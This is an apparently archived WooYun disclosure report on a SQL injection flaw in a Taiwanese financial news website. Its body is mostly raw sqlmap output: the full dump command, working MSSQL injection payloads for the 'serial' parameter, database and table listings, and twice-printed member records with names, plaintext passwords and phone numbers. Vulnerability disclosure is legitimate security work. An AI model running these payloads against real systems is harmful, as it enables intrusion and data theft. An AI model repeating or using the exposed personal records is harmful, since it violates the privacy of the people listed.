乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
全球經貿瞬息萬變,網際網路時代的來臨,也徹底改變了資訊傳輸與媒體的生態,想要在21世紀國際競爭中脫穎而出、創造企業優勢,就需要第一手的即時財經情報。
地址:http://**.**.**.**/newsContent.aspx?serial=6760
$ python sqlmap.py -u "http://**.**.**.**/newsContent.aspx?serial=6760" -p serial --technique=BEQ --random-agent --batch -D w02040 -T dbo.Members -C name,password,phone,id,email --dump --start 1 --stop 10
Database: w02040+-------------+---------+| Table | Entries |+-------------+---------+| dbo.Members | 4853 |+-------------+---------+
Database: w02040Table: Members[10 entries]+---------------------+------------+-----------------+------------+--------------------------------------------------------------+| name | password | phone | id | email |+---------------------+------------+-----------------+------------+--------------------------------------------------------------+| 陳 an an | an420912 | 04-26229874 | an745123 | chen3268@**.**.**.** || 黃智洋 | cy79113 | | cy79113 | cyhuang6531808@**.**.**.** || 周強生 | 62768278 | 02-22858862 | man | per@**.**.**.** || 林鴻銘 | t344328a | 0918155211 | takuya168 | takuya1688@**.**.**.** || 李傑 | !1qaz2ws | | !1qaz2ws | neil.tpe@**.**.**.** || 陳芳美 | h888988 | 23576588 | ?。88988 | feng2088988 || ?成仕 | 660124sc | | ??菜?148 | sunchengshi@**.**.**.** || ?成仕 | 660124sc | | ??菜?888 | sunchengshi@**.**.**.** || 孫美英 | C5ICKVE4 | 02(22229108 | ?a45782 | a45782@kimo。com || 廖明玉 | Azyx2355 | 0933258486 | @093325848 | |+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
current user: 'w02040'current user is DBA: Falsedatabase management system users [6]:[*] BUILTIN\\Administrators[*] CSTV\\Administrator[*] sa[*] TB[*] TB_w[*] w02040Database: tempdb+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.syssegments | 3 |+-------------------------------+---------+Database: master+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.spt_values | 730 || dbo.spt_datatype_info | 36 || dbo.spt_server_info | 29 || dbo.spt_provider_types | 25 || dbo.spt_datatype_info_ext | 10 || dbo.spt_monitor | 1 |+-------------------------------+---------+Database: w02040+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.Video_hit_tbl | 48672 || dbo.tbl_影音主檔 | 46425 || dbo.Vw_影音 | 11963 || dbo.teacherNewsActi | 4866 || dbo.Members | 4853 || dbo.teacherReportFax | 4511 || dbo.reportFaxContent_vw | 4508 || dbo.NewsActiContent_vw | 3283 || dbo.EventBillboard_tbl | 922 || dbo.InvestCompany_Member_tbl | 693 || dbo.AnalyzerChannel_tbl | 552 || dbo.LVMH_order | 368 || dbo.LVMH_OrderDetail | 368 || dbo.Analyzer_tbl | 256 || dbo.Analyzer_Company_vw | 252 || dbo.Analyzer_vw | 252 || dbo.AnalyzerDVD_tbl | 127 || dbo.AnalyzerVoice_tbl | 127 || dbo.admin_UserPerm_tbl | 126 || dbo.LVMH_Sales | 115 || dbo.AnalyzerProgram_tbl | 109 || dbo.InvestCompany_tbl | 95 || dbo.sysconstraints | 79 || dbo.LVMH_ID | 65 || dbo.AnalyzerChannel_vw | 59 || dbo.vw_MoneyTV_排行榜 | 48 || dbo.Vw_排行榜 | 46 || dbo.TB_SentBooks_tbl | 40 || dbo.Forum | 35 || dbo.TB_Members_Duty_vw | 29 || dbo.admin_user_tbl | 28 || dbo.forumTalk | 28 || dbo.view_最近影音 | 27 || dbo.TB_Duty_Detail_tbl | 25 || dbo.Vw_重大要聞 | 22 || dbo.admin_permission_tbl | 21 || dbo.NewsActiKind | 18 || dbo.AD_tbl | 15 || dbo.TB_Members_tbl | 14 || dbo.Analyzer_Voice_vw | 13 || dbo.TB_Member_Unit_vw | 13 || dbo.Analyzer_Company_Count_vw | 12 || dbo.TB_Duty_tbl | 11 || dbo.ADType_tbl | 8 || dbo.shop | 8 || dbo.TB_Backend_Functions_tbl | 7 || dbo.ReportFaxKind | 6 || dbo.TB_Donation_Type_tbl | 6 || dbo.TB_Lib_Detail_tbl | 6 || dbo.TB_Member_Borrow_vw | 6 || dbo.FuturesWebSite_tbl | 3 || dbo.Info_tbl | 3 || dbo.syssegments | 3 || dbo.TB_Donate_tbl | 3 || dbo.TB_Members_Donate_vw | 3 || dbo.billboard_vw | 1 || dbo.EventBillboard_vw | 1 || dbo.Magazine_tbl | 1 || dbo.OnLineStream_tbl | 1 || dbo.OnLineStream_vw | 1 || dbo.PageView_tbl | 1 || dbo.TB_Bible_tbl | 1 || dbo.TB_Donate_Detail_tbl | 1 || dbo.TB_Lib_tbl | 1 || dbo.TB_Msg_tbl | 1 || dbo.Vw_影音最近日 | 1 |+-------------------------------+---------+Database: msdb+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.sysconstraints | 99 || dbo.syscategories | 19 || dbo.backupfile | 10 || dbo.backupmediafamily | 9 || dbo.backupmediaset | 9 || dbo.backupset | 9 || dbo.restorefile | 2 || dbo.restorefilegroup | 1 || dbo.restorehistory | 1 |+-------------------------------+---------+columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: serial (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: serial=6760 AND 2345=2345 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000Database: w02040Table: Video_hit_tbl[5 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| hit | int || lastUpdated | smalldatetime || postdate | char || source | smallint || videoFileName | char |+---------------+---------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: serial (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: serial=6760 AND 2345=2345 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000Database: w02040Table: Members[14 columns]+------------------+----------+| Column | Type |+------------------+----------+| addr | char || birthday | datetime || cellphone | char || createDate | datetime || email | char || id | char || name | char || password | char || phone | char || sex | bit || vip | char || vipBlackListDate | datetime || vipPoint | int || vipValidDate | datetime |+------------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: serial (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: serial=6760 AND 2345=2345 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000Database: w02040+-------------+---------+| Table | Entries |+-------------+---------+| dbo.Members | 4853 |+-------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: serial (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: serial=6760 AND 2345=2345 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000Database: w02040Table: Members[10 entries]+---------------------+------------+-----------------+------------+--------------------------------------------------------------+| name | password | phone | id | email |+---------------------+------------+-----------------+------------+--------------------------------------------------------------+| 陳 an an | an420912 | 04-26229874 | an745123 | chen3268@**.**.**.** || 黃智洋 | cy79113 | | cy79113 | cyhuang6531808@**.**.**.** || 周強生 | 62768278 | 02-22858862 | man | per@**.**.**.** || 林鴻銘 | t344328a | 0918155211 | takuya168 | takuya1688@**.**.**.** || 李傑 | !1qaz2ws | | !1qaz2ws | neil.tpe@**.**.**.** || 陳芳美 | h888988 | 23576588 | ?。88988 | feng2088988 || ?成仕 | 660124sc | | ??菜?148 | sunchengshi@**.**.**.** || ?成仕 | 660124sc | | ??菜?888 | sunchengshi@**.**.**.** || 孫美英 | C5ICKVE4 | 02(22229108 | ?a45782 | a45782@kimo。com || 廖明玉 | Azyx2355 | 0933258486 | @093325848 | |+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-12-02 15:59
感謝通報
暂无